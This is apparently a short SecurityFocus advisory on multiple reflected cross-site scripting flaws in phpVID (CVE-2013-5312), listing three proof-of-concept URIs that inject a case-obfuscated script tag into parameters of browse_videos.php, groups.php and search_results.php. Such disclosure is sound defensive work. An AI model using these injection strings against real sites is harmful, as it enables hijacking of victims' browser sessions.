phpVID CVE-2013-5312 Multiple Cross Site Scripting Vulnerabilities

An attacker can use a browser to exploit these issues. An attacker must trick a victim into following a malicious URI to exploit cross-site scripting issues.

The following example URIs are available:

http://www.example.com/browse_videos.php?cat=&n=1'<ScRiPt >prompt(959580)</ScRiPt> [XSS]

http://www.example.com//groups.php?cat=1'<ScRiPt >prompt(987925)</ScRiPt> [XSS]

http://www.example.com//search_results.php?query=<ScRiPt >prompt(931776)</ScRiPt> [XSS]


 

Privacy Statement
Copyright 2010, SecurityFocus